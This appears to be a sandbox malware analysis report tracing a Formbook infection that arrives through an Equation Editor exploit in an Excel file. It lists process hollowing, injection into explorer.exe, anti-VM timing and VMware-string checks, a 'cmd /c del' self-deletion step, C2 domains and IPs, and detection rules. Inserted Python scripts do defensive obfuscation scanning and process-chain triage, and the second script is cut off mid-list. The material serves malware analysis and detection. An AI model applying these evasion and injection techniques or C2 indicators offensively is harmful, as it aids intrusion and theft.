Source: C:\Users\Public\vbc.exe Code function: 6_2_00C8C5F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C7351F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C7E6C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C74680
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D12622
Source: C:\Users\Public\vbc.exe Code function: 6_2_00CA57C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_00CF579A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C7C7BC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D0F8EE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C7C85C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C9286D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C869FE
Source: C:\Users\Public\vbc.exe Code function: 6_2_00D1098E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02591238
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024EE2E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F7353
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0253A37B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F2305
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024EF3CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_025163DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0250905A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F3040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0251D005
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024EE0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02592622
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024FE6C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F4680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_025257C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0257579A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024FC7BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0252D47D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02525485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02501489
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F351F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0250C5F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_025A3A83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02517B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0257DBDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024EFBD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0259CBA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024FC85C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0251286D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0258F8EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02575955
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_025069FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0259098E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F29B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0250EE4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02522E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0251DF7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02500F3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024FCD5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_02520D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0258FDDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000BC75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000A8C5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000A8C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000A2D87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000A2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000A2FB0
Source: Form BA.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CDF970 appears 48 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00C6DF5C appears 72 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB373B appears 132 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB3F92 appears 63 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0255F970 appears 81 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02533F92 appears 108 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0253373B appears 238 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EDF5C appears 112 times
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: pool[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: pool[1].exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: vbc.exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 5.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.2.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/19@4/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Form BA.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD82.tmpJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: Form BA.xlsxVirustotal: Detection: 31%
      Source: Form BA.xlsxReversingLabs: Detection: 30%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Form BA.xlsx Static file information: File size 1277440 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
Source: Form BA.xlsx Initial sample: OLE indicators vbamacros = False
Source: Form BA.xlsx Initial sample: OLE indicators encrypted = True
Source: C:\Users\Public\vbc.exe Code function: 6_2_0027951F push 72060001h; retf 0016h
Source: C:\Users\Public\vbc.exe Code function: 6_2_004199C4 push si; iretd
Source: C:\Users\Public\vbc.exe Code function: 6_2_004151D2 push eax; retf
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419BB5 push ss; ret
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B3B5 push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B46C push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B402 push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B40B push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 6_2_004155A9 push ss; iretd
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CECD pushad; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024EDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B51D2 push eax; retf
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000BB3B5 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000BB40B push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000BB402 push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000BB46C push eax; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B55A9 push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B99C4 push si; iretd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000B9BB5 push ss; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_000BCECD pushad; retf
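The push/ret pairs listed above (a push immediately followed by ret, retf or iretd, so the pushed value becomes the next instruction pointer) break linear-sweep disassembly and are a common marker of packed or hand-obfuscated code; the same pattern is reported in both the unpacked vbc.exe image and the hollowed rundll32.exe. The scanner below is an added example, not Joe Sandbox code. Its opcode table covers only the push and return encodings needed here, so it needs no disassembler, and SAMPLE is a constructed byte string that encodes the sequences listed above together with an ordinary prologue and epilogue that must not be flagged.

```python
"""Static scan for push/ret control-flow obfuscation (added example, not Joe Sandbox code).

Flags a push instruction directly followed by ret / ret imm16 / retf / retf imm16 / iretd,
i.e. the 'push eax; ret', 'push ss; iretd', 'pushad; retf' and
'push 72060001h; retf 0016h' sequences listed in this report.
"""

# Single-byte push encodings (32-bit mode).
PUSH_1 = {0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
          0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
          0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
          0x60: "pushad"}
REG16 = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]
RET_1 = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}
RET_IMM16 = {0xC2: "ret", 0xCA: "retf"}


def decode_push(code, i):
    """(mnemonic, length) if a push instruction starts at code[i], else None."""
    b = code[i]
    if b in PUSH_1:
        return PUSH_1[b], 1
    if b == 0x66 and i + 1 < len(code) and 0x50 <= code[i + 1] <= 0x57:
        return f"push {REG16[code[i + 1] - 0x50]}", 2      # 66 5x: operand-size prefix, 16-bit register
    if b == 0x68 and i + 4 < len(code):                     # 68 imm32
        return f"push {int.from_bytes(code[i + 1:i + 5], 'little'):08X}h", 5
    if b == 0x6A and i + 1 < len(code):                     # 6A imm8
        return f"push {code[i + 1]:02X}h", 2
    return None


def decode_ret(code, i):
    """(mnemonic, length) if a near, far or interrupt return starts at code[i], else None."""
    if i >= len(code):
        return None
    b = code[i]
    if b in RET_1:
        return RET_1[b], 1
    if b in RET_IMM16 and i + 2 < len(code):                # C2/CA imm16
        return f"{RET_IMM16[b]} {int.from_bytes(code[i + 1:i + 3], 'little'):04X}h", 3
    return None


def find_push_ret(code, base=0):
    """Byte-aligned sliding scan over a code blob: every push directly followed by a return.

    Returns [(address, 'push ...; ret...')]. After a hit the scan skips past the pair so one
    site is reported once; everywhere else it advances one byte, like the sandbox's own
    interceptor, because obfuscated code need not start on instruction boundaries.
    """
    hits, i = [], 0
    while i < len(code):
        push = decode_push(code, i)
        ret = decode_ret(code, i + push[1]) if push else None
        if push and ret:
            hits.append((base + i, f"{push[0]}; {ret[0]}"))
            i += push[1] + ret[1]
        else:
            i += 1
    return hits


# Constructed sample: the report's sequences plus a normal prologue/epilogue (not hits).
SAMPLE = bytes.fromhex(
    "55 8B EC"                  # push ebp; mov ebp, esp      (ordinary prologue)
    "50 C3"                     # push eax; ret
    "90"                        # nop
    "16 CF"                     # push ss; iretd
    "60 CB"                     # pushad; retf
    "68 01 00 06 72 CA 16 00"   # push 72060001h; retf 0016h
    "66 56 CF"                  # push si; iretd
    "51 C3"                     # push ecx; ret
    "C9 C3"                     # leave; ret                  (ordinary epilogue)
)


def scan_sample(base=0x401000):
    """Run the scanner over SAMPLE as if it were mapped at `base`."""
    return find_push_ret(SAMPLE, base)


if __name__ == "__main__":
    for addr, text in scan_sample():
        print(f"{addr:08X}  {text}")
```

A hit is a triage signal, not a verdict: `push reg; ret` is also a legitimate indirect-jump idiom in compiler output, and a byte-aligned scan over data or resource sections will produce coincidental matches. Read it together with the other static indicators in this report, such as the .text section entropy of 7.58 on the dropped executables.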
Source: initial sample Static PE information: section name: .text entropy: 7.57808526391
Source: initial sample Static PE information: section name: .text entropy: 7.57808526391
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

      Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (9 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 times)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (24 times)
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: Form BA.xlsx Stream path 'EncryptedPackage' entropy: 7.99876353791 (max. 8.0)

      Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000000A85E4 second address: 00000000000A85EA instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000000A897E second address: 00000000000A8984 instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe Code function: 6_2_004088B0 rdtsc
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2992 Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1764 Thread sleep time: -51703s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2320 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 51703
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.2194096339.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe Binary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.000
Source: explorer.exe, 00000007.00000000.2208992815.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Users\Public\vbc.exe Code function: 6_2_004088B0 rdtsc
Source: C:\Users\Public\vbc.exe Code function: 6_2_00409B20 LdrLoadDll,
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C500EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C50080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe Code function: 6_2_00C726F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_024F26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.pon.xyz
Source: C:\Windows\explorer.exe Network Connect: 151.101.0.119 80
Source: C:\Windows\explorer.exe Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe Domain query: www.intoxickiss.com
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 20000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
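Read together, the process, network and dropped-file rows in this report describe the whole chain: EQNEDT32.EXE writes and starts C:\Users\Public\vbc.exe, which re-launches itself, hollows rundll32.exe, injects into explorer.exe and finally removes its own file with cmd /c del, while explorer.exe performs the C2 lookups. The script below is an added example, not Joe Sandbox or Sigma code. It parses rows in the shape the report uses ("Source: <process> <event>: <value>", tolerating the extraction artefact where the two run together), rebuilds the parent/child tree and applies the checks behind the Sigma-style signatures listed in this report: Equation Editor spawning a child, execution from C:\Users\Public, rundll32 with no arguments, self-deletion through cmd /c del and network activity from a system process. ROWS is constructed from the report's own entries; the EQNEDT32.EXE connection to 3.121.113.175:80 is taken from the behavior graph.

```python
"""Triage of sandbox behaviour rows for the EQNEDT32 -> vbc.exe -> rundll32/explorer chain.

Added example, not Joe Sandbox or Sigma code. Rows are parsed in the report's own
'Source: <process> <event>: <value>' shape; ROWS is constructed from this report.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*"                       # lazy: stops at the first known event label
    r"(?P<kind>Process created|Network Connect|Domain query|File created):\s*"
    r"(?P<val>.*?)(?:\s*Jump to [\w ]+)?$")             # drop the report's 'Jump to ...' link text
IMAGE_RE = re.compile(r"(?P<image>.+?\.exe)(?:\s+(?P<cmd>.*))?$", re.I)
SUSPICIOUS_DIRS = ("c:\\users\\public", "\\appdata\\local\\temp", "c:\\programdata")
SYSTEM_NO_NET = {"explorer.exe", "rundll32.exe", "eqnedt32.exe"}  # should not talk to the network

# Constructed from the report's Process created / Network Connect / Domain query / File created rows.
ROWS = [
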